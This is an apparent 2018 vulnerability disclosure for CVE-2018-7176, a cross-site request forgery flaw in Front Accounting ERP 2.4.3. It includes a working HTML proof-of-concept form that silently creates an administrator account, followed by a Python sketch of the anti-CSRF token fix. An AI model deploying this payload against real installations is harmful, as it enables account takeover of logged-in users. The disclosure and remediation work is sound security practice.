Friday, 16 February 2018

Cross Site Request Forgery- Front Accounting ERP 2.4.3 - CVE-2018-7176



By- Samrat Das

Hi Readers,

Recently, while performing some open source security assessment, I came across an ERP application, Front Accounting. Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities.

Title of the Vulnerability: Cross Site Request Forgery
Vulnerability Class: Remote Code Execution / Account takeover
Technical Details & Description: The application's state-changing forms (such as "add user") are accepted without any anti-CSRF countermeasure, so a maliciously crafted HTML page hosted on another site can submit them on behalf of a logged-in user.
CVE ID allocated: CVE-2018-7176
Product & Service Introduction: Front Accounting 2.4.3
Steps to Reproduce:
1. Visit the application.
2. Visit the User Permissions page.
3. Go to "Add user" and craft a CSRF exploit page for that form. Host it on a server and send the link to the victim; when the victim opens it while logged in, the forged request is executed.
Exploitation Technique: An attacker can modify application data, up to and including complete account takeover.
Severity Level: Critical
Security Risk:
The presence of such a flaw can lead to user data compromise as well as account takeover.

Exploit code:
<html>
 <body>
    <form action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml" method="POST" enctype="text/plain">
      <input type="hidden" name="show&#95;inactive" value="&amp;user&#95;id&#61;Newadmin&amp;password&#61;Newadmin&amp;real&#95;name&#61;New&#37;20Admin&amp;phone&#61;&amp;email&#61;&amp;role&#95;id&#61;8&amp;language&#61;C&amp;pos&#61;1&amp;print&#95;profile&#61;&amp;rep&#95;popup&#61;1&amp;ADD&#95;ITEM&#61;Add&#37;20new&amp;&#95;focus&#61;user&#95;id&amp;&#95;modified&#61;0&amp;&#95;confirmed&#61;&amp;&#95;token&#61;Ta6aiT2xqlL2vg8u9aAvagxx&amp;&#95;random&#61;757897&#46;6552143205" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affected Product Version: 2.4.3

Solution - Fix & Patch: Every state-changing request should carry an anti-CSRF token that is bound to the user's session and validated server-side before the action is performed; this mitigates Cross Site Request Forgery.
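As an added example (not Front Accounting's own code), the following Python sketch shows the server-side check that the fix calls for: a token minted per session, compared in constant time on every state-changing request, plus a content-type check that rejects the enctype="text/plain" form the PoC above relies on. The endpoint function, the session dict and the request bodies are assumptions constructed for illustration; the token value is the one from the PoC.

```python
import hmac
import secrets
from urllib.parse import parse_qs


def issue_token(session: dict) -> str:
    """Mint a fresh anti-CSRF token and bind it to the caller's session."""
    token = secrets.token_urlsafe(24)
    session["_token"] = token
    return token


def handle_add_user(session: dict, content_type: str, body: str) -> tuple:
    """Hypothetical 'add user' endpoint with the checks the advisory asks for."""
    # A cross-site HTML form can only send urlencoded, multipart or text/plain bodies.
    # Refusing everything but the encoding this endpoint expects removes the
    # text/plain trick used by the PoC to smuggle a query string.
    if content_type.split(";")[0].strip() != "application/x-www-form-urlencoded":
        return 415, "unsupported content type"
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    expected = session.get("_token")
    submitted = params.get("_token", "")
    # Constant-time compare against the token bound to *this* session; a token
    # copied from the attacker's own session, or a stale one, does not match.
    if not expected or not hmac.compare_digest(expected, submitted):
        return 403, "missing or invalid anti-CSRF token"
    return 200, "added user %s with role_id %s" % (params.get("user_id"), params.get("role_id"))


# Constructed sample bodies mirroring the PoC's fields (not captured traffic).
FORGED_FIELDS = ("user_id=Newadmin&password=Newadmin&role_id=8"
                 "&ADD_ITEM=Add%20new&_token=Ta6aiT2xqlL2vg8u9aAvagxx")
# What the PoC's enctype="text/plain" form actually transmits: a single field
# named "show_inactive" whose value is the smuggled query string.
FORGED_TEXT_PLAIN_BODY = "show_inactive=&" + FORGED_FIELDS + "\r\n"


def demo() -> list:
    """Run the three cases: text/plain forgery, replayed token, legitimate token."""
    session = {}
    legit_token = issue_token(session)
    urlencoded = "application/x-www-form-urlencoded"
    return [
        handle_add_user(session, "text/plain", FORGED_TEXT_PLAIN_BODY)[0],   # 415
        handle_add_user(session, urlencoded, FORGED_FIELDS)[0],              # 403
        handle_add_user(session, urlencoded,
                        FORGED_FIELDS.replace("Ta6aiT2xqlL2vg8u9aAvagxx", legit_token))[0],  # 200
    ]


if __name__ == "__main__":
    print(demo())
```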
